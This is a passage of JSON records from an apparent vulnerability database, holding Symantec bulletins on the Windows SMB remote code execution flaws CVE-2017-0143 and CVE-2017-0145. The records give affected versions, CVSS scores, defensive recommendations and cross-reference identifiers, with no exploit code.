"2017-03-15T15:17:01"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-13T10:05:55", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-03-13T10:05:55", "rev": 2, "value": 9.0, "vector": "NONE"}}, "hash": "ef0135522a9267c03dd57804d73f9c73b5634f8b1f4b23fa840ef534d397d81f", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "f67bdf2a5913bc747e96ab7c5ecd1edf", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "eab0fc33a60c89e69362e22d3391fa94", "key": "title"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96703", "id": "SMNTC-96703", "immutableFields": [], "lastseen": "2018-03-13T10:05:55", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 382}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-13T10:05:55"}], "viewCount": 474, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 9.0, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X86 "}, {"name": "microsoft windows vista service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for 32-bit Systems "}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "c74a882435f0574ba322c965844414a4"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "ae9f420b26fd277e3efcc881d7d236ae"}, {"key": "href", "hash": "f67bdf2a5913bc747e96ab7c5ecd1edf"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "12432522d29cb6b9b409867cd87e588e"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "eab0fc33a60c89e69362e22d3391fa94"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null, "cvss2": {}, "cvss3": {}}, {"id": "SMNTC-96705", "hash": "838dab6b5cfe969753a475cd7ad276b2f569538a21e7471ebb012292c377d9d8", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0145 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96705", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0145"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": "Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. \n", "enchantments": {"score": {"modified": "2017-03-15T15:17:00", "value": 8.5}}, "hash": "f7e37aec752da08fe21d30b3c0755dafdb67f92a08670c35c80b871dfd7c7c5f", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96705", "id": "SMNTC-96705", "lastseen": "2017-03-15T15:17:00", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0145 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 13}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:00"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista 